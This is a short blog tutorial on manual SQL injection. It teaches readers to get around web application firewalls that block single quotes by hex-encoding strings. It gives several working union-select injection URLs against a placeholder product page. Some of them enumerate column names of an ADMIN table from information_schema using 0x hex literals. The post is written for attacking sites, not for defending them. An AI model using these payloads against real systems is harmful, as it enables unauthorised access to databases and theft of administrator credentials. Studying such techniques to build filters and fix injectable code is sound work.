After A long Time i'm Back With Another Tutorial on SQL Injection.In this Tutorial we will Discuss about Converting Syntax in Hex Value.Many Of Noobs Like me Dont know The usage of Hex Value.
Some Times In Our Regular Manually Injecting we came To such Sites where we cant Get Data from Our SQLi Command.
For Example we gave Command for Printing Our Name on the Web Page.
so we Will Normally Add Name in the Vulnerable Column Enclosed By Single Quotes ' Before and After the Name.
https://www.Target-Site.com/product.php?id=11 and false union select 1,2,group_concat('RAi Jee'),3,4-- -
When we Execute This Command Sometimes This Doesn't Work .Actually this Shit Happen because of Some Sites WAF's have Blocked The Usage of Single Magic Quotes .
So in Such cases we have to deal with it by Converting Our Syntax in HEX value.
we can Convert Our Syntax in Hex with HACKBAR .But Here is a online Website which also Convert our Syntax in HEX Value.
Link:www.asciitohex.com
Our Syntax:RAi Jee
Hex Value:524169204a6565
we have to Use 0x Before our HEX Value to make it Executable.
https://www.Target-Site.com/product.php?id=11 and false union select 1,2,group_concat(0x524169204a6565),3,4-- -
We can do the Same in for other Purpose where Single Quotes Doesn't Work .
https://www.Target-Site.com/product.php?id=11 and false union select 1,2,group_concat(column_name),3,4 from information_schema.columns where table_name='ADMIN'-- -
If it Doesn't work Then we will Encode our Syntax in Hex Value.
0x 41444d494e (HEX_VALUE_OF_ADMIN)
https://www.Target-Site.com/product.php?id=11 and false union select 1,2,group_concat(column_name),3,4 from information_schema.columns where table_name=0x41444d494e-- -
We can Also Encode Our HTML TAGS to HEX Value whenever SINGLE Quote Doesn't Exist.
AUTHOR:Rai Muzammal Hussain a.k.a RAi Jee
0 comments:
Post a Comment